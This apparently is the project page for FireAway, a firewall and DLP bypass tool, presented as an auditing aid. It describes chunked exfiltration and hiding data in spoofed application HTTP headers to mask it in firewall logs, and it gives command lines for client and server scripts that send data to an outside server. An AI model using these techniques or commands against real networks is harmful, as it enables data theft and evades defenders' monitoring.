Home

Awesome

FireAway-Next Generation Firewall Bypass Tool

v0.2

Fireaway is a tool for auditing, bypassing, and exfiltrating data against layer 7/AppID inspection rules on next generation firewalls, as well as other deep packet inspection defense mechanisms, such as data loss prevention (DLP) and application aware proxies. These tactics are based on the principle of having to allow connections to establish through the NGFW in order to see layer 7 data to filter, as well as spoofing applications to hide communication channels inside the firewall logs as normal user traffic, such as Internet surfing. In the case of bypassing data loss prevention tools, Fireaway sends data in small "chunks", which do not match regular expression triggers and other DLP rules, as well as embedding data in spoofed HTTP headers of legitimate applications which most data loss prevention technologies are not designed to inspect. The tool also has had success defeating anomaly detection and heursitics engines through its ability to spoof application headers and hide data inside them.

Starting the FireAway Server: Typically the FireAway server would be started on the egress side of the firewall (such as a server on the Internet), and listen on a port believed to be closed to see if any application based rules allow traffic out on this port, or to receive raw data chunks to see if DLP or application proxies can identify them:

python fa_server.py <port to listen on>  <mode number>

The server can be started in four modes:

All data received by the servers on the specified port will be saved to the file ReceivedData.txt in the directory the server was launched from. If the server detects differing sizes in the amount of data received (indicating firewall filtering has kicked in), this output will be shown on the server console:

Got the same or lower amount of data on two consecutive runs.  If sending test data, maximum data leak size may have been reached.

Starting the FireAway Client/Application Spoofer: The FireAway client has three modes:

To start the basic client:

python fa_client.py <FireAway server IP or path of server list file> <Fireaway Server Port> <Client mode>

The list of servers should be a simple text file containing a list of IP addresses, one per line. If only using one server, a single IP can be specified instead.

The application spoofing client has three modes:

To start the application spoofing client:

python fa_spoof.py <FireAway Server IP or path of server list file > <Fireaway Server Port> <Client mode>

Application spoofing will randomly insert HTTP headers inside legitmate looking application headers (e.g. Facebook, LinkedIn, etc.) with the data chunks to pollute the logs with various applications in order to mask the data exfiltration.

Fireaway Reassembler: The Fireaway reassembler (fa_assembler.py) is used to reassemble data received by the Fireaway servers. The assembler has threee modes, which correspond to the mode of the servers which received the data:

To start the reassembler:

python fa_assembler.py <reassembly mode> <comma separated paths to files to reassemble>

Output will be saved to the filename specified.

Please report any isues or questions though Github.